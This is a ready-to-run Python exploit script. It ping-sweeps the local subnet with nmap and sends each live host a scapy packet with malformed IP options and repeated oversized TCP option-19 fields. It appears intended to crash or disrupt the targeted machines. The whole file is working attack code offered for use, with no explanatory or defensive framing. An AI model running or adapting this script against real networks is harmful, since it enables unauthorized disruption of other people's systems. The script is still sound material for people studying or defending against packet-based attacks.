exploit.py

#! /usr/bin/python3

import os
import time
import nmap
import struct
from scapy.all import *
import netifaces as ni
import ipaddress

class Exploit():

    def __init__(self, interface):
        self.interface = interface
        self.get_info()
        self.ask()

    def red(self, msg): print('\033[91m[!] {}\033[00m' .format(msg))
    def green(self, msg): print('\033[92m[+] {}\033[00m' .format(msg))
    def yellow(self, msg): print('\033[93m[+] {}\033[00m' .format(msg))
    def blue(self, msg): print('\033[94m[*] {}\033[00m' .format(msg))
    def purple(self, msg): print('\033[95m[*] {}\033[00m' .format(msg))
    def cyan(self, msg): print('\033[96m[*] {}\033[00m' .format(msg))

    def get_info(self):
        ni.ifaddresses(self.interface)
        self.ip = ni.ifaddresses(self.interface)[ni.AF_INET][0]['addr']
        self.subnet = ni.ifaddresses(self.interface)[ni.AF_INET][0]['netmask']
        self.net = ipaddress.ip_interface('{}/{}'.format(self.ip, self.subnet))
        self.network = self.net.network

    def ask(self):
        try:
            if not os.geteuid() == 0:
                self.red('scapy requires root privileges.')
                sys.exit(0)
            self.purple('Default mode configuration:')
            self.green('Your IP: {}'.format(self.ip))
            self.green('Your network: {}'.format(self.network))
            self.blue('Go to custom configuration ? ["yes"/"no"] ')
            isdefault = input()
            if isdefault=='no': self.attack()
            else:
                self.yellow('What is YOUR IP address ? (example: 192.168.1.95) ')
                self.ip = input()
                self.yellow('What is the subnet address ? (example: 192.168.1.0/24) ')
                self.network = input()
                self.attack()
        except KeyboardInterrupt:
            self.red('Interrupted\n')
            try: sys.exit(0)
            except SystemExit: os._exit(0)

    def attack(self):
        self.blue("Scanning network, please wait...")
        nm = nmap.PortScanner()
        nm.scan(hosts=str(self.network), arguments='-sP')
        list_of_ips = nm.all_hosts()
        if not list_of_ips: self.red('An error has occured while trying to scan network...')
        list_of_ips = sorted(list_of_ips, key=lambda ip: struct.unpack("!L", inet_aton(ip))[0])
        for host in list_of_ips:
            self.yellow("Sending Payload to {} ".format(host))
            send(IP(src=self.ip, dst=host, options="x")/TCP(options=[(19,"x"*18),(19,"x"*18)]))
            time.sleep(0.2)

if __name__ == '__main__':
    exploit = Exploit('wlp3s0')